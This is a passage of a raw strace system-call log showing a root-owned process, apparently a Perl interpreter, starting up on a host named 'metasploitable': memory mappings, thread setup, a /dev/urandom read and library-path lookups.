\0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\17\0\0\0\22\0\0\0\2\0\0\0\6\0\0\0\4\311\240, \4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\22\0\0\0\23\0\0\0\24\0\0\0\0\0\0\0\25\0\0\0\26\0\0\0\0\0\0\0\27\0\0\0\0\0\0\0\30\0\0\0\31\0\0\0\0\0\0\0k\31Qj\233(\375B\233`\205\33\327\16?\17I->\333\235C\r\375\313\373_\22\325=l\366\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0o\0\0\0\0\0\0\0\35\0\0\0\22\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\37\0\0\0\0\0\0\0", 512) = 512

10004 07:30:53.673936 fstat64(1, {st_mode=S_IFREG|0644, st_size=38300, ...}) = 0

10004 07:30:53.673953 mmap2(NULL, 201052, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d20000

10004 07:30:53.673964 mmap2(0xb7d29000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d29000

10004 07:30:53.673978 mmap2(0xb7d2b000, 155996, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7d2b000

10004 07:30:53.673991 close(1)          = 0

10004 07:30:53.674015 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d1f000

10004 07:30:53.674028 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7d1f8c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

10004 07:30:53.674087 mprotect(0xb7e9b000, 4096, PROT_READ) = 0

10004 07:30:53.674114 munmap(0xb7ee3000, 29913) = 0

10004 07:30:53.674127 set_tid_address(0xb7d1f908) = 10004

10004 07:30:53.674136 set_robust_list(0xb7d1f910, 0xc) = 0

10004 07:30:53.674145 futex(0xbfeee380, 0x81 /* FUTEX_??? */, 1) = 0

10004 07:30:53.674160 rt_sigaction(SIGRTMIN, {0xb7ea52c0, [], SA_SIGINFO}, NULL, 8) = 0

10004 07:30:53.674182 rt_sigaction(SIGRT_1, {0xb7ea5340, [], SA_RESTART|SA_SIGINFO}, NULL, 8) = 0

10004 07:30:53.674224 rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0

10004 07:30:53.674238 getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0

10004 07:30:53.674274 uname({sys="Linux", node="metasploitable", ...}) = 0

10004 07:30:53.674320 rt_sigaction(SIGFPE, {SIG_IGN}, {SIG_DFL}, 8) = 0

10004 07:30:53.674365 brk(0)            = 0x8153000

10004 07:30:53.674374 brk(0x8174000)    = 0x8174000

10004 07:30:53.674417 getuid32()        = 0

10004 07:30:53.674427 geteuid32()       = 0

10004 07:30:53.674436 getgid32()        = 0

10004 07:30:53.674444 getegid32()       = 0

10004 07:30:53.674481 mmap2(NULL, 135168, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7cfe000

10004 07:30:53.674507 open("/dev/urandom", O_RDONLY|O_LARGEFILE) = 1

10004 07:30:53.674523 read(1, "EW\255\272", 4) = 4

10004 07:30:53.674536 close(1)          = 0

10004 07:30:53.674554 time(NULL)        = 1495625453

10004 07:30:53.674595 stat64("/usr/local/lib/site_perl/5.8.8/i486-linux-gnu-thread-multi", 0xbfeee050) = -1 ENOENT (No such file or directory)

10004 07:30:53.674612 stat64("/usr/local/lib/site_perl/5.8.8", 0xbfeee050) = -1 ENOENT (No such file or directory)

10004 07:30:53.674630 stat64("/usr/local/lib/site_perl/i486-linux-gnu-thread-multi", 0xbfeee050) = -1 ENOENT (No such file or directory)

10004 07:30:53.674645 stat64("/usr/local/lib/perl/5.8.7", 0xbfeee190) = -1 ENOENT (No such file or directory)

10004 07:30:53.674657 stat64("/usr/local/share/perl/5.8.7", 0xbfeee190) = -1 ENOENT (No such file or directory)

10004 07:30:53.674681 stat64("/usr/local/lib/perl/5.8.6", 0xbfeee190) = -1 ENOENT (No such file or directory)

10004 07:30:53.674695 stat64("/usr/local/share/perl/5.8.6", 0xbfeee190) = -1 ENOENT (No such file or directory)

